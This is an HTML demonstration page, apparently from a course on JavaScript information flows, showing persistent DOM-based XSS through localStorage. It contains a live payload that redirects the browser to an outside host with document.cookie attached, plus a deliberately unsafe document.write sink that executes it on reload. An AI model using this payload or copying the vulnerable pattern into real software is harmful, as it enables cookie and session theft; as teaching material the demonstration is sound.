<!--
To change this template, choose Tools | Templates
and open the template in the editor.
-->
<!DOCTYPE html>
<html>
<head>
  <meta http-equiv="set-cookie" content="a=b;"/>  
    <!-- Stylesheets -->
    <link rel="stylesheet" type="text/css" href="ink-2.2.1/css/ink.css">
    <link rel="stylesheet" type="text/css" href="ink-2.2.1/css/docs.css">

    <!-- JavaScript -->
    <script type='application/javascript' src="ink-2.2.1/js/prettify.js"></script>
  <title>General Implicit Flow</title>
  <!--<meta http-equiv="Content-Script-Type" content="application/JavaScript" />-->
  <script type="application/javascript">
    function supports_html5_storage() {
      try {
        return 'localStorage' in window && window['localStorage'] !== null;
      } catch (e) {
        return false;
      }
    }
  
  function main()
  {
      alert(supports_html5_storage());
      var name = "<script>window.location='http://www.supelec.fr?a='+document.cookie;<\/script>"; 
      //This generally comes as a form input !
      localStorage["name"]=name;
      
  }
  </script>
</head>
<body>
    <div id="topbar">
        
            <nav class="ink-navigation">
                <ul class="horizontal menu blue flat shadowed">
                    <li>
                        <a class="logoPlaceholder" href="index.html">Information Flows in JS<br></a>
                    </li>  
                    
                </ul>
            </nav>
        </div>
<div class="ink-grid"> <br>
    <div class="whatIs">    
        <h1 id="name"><script>document.write(localStorage["name"]);</script></h1>
        <h2>XSS / Persistent XSS / DOM XSS</h2>
        <p>
  This page demonstrates the XSS coupled by persistence provided by localStorage
        </p>
    </div>
    <p><span class="ink-label info">Code</span> JS <button id="prettify_a" style="color:blue;background-color: white;" onclick="javascript:prettyPrint();document.getElementById('prettify_a').style.display='none';scrollByPages(1);">Prettify</button></p>
    <pre style='color:red' class="prettyprint linenums">function supports_html5_storage() 
{
    try 
    {
        return 'localStorage' in window && window['localStorage'] !== null;
    } 
    catch (e) 
    {
        return false;
    }
}
function main()
{
    alert(supports_html5_storage());
    var name = "&lt;script&gt;window.location='http://www.supelec.fr?'+document.cookie;&lt;/script&gt;"; 
    //This generally comes as a form input !
    localStorage["name"]=name;

}</pre>
    <p><span class="ink-label info">Code</span> HTML</p>
<pre style='color:red' class="prettyprint linenums">&lt;h1 id="name"&gt;&lt;script&gt;document.write(localStorage["name"]);&lt;/script&gt;&lt;/h1&gt;</pre>
  
  <p><span class="ink-label warning">Note</span><br>Clear localStorage and cookies (or add cookies if needed) from console.
  </p>
  <br>

  <p>
  <span class="ink-label success">Instructions</span><br>
  Click on the 'Run Example' button, and then reload the page. You may also try loading the page in a new window and the attack will persist.
  </p>
  <br>
  <button class="ink-button red" onclick="main();">Run Example</button>
</div>
</body>
</html>

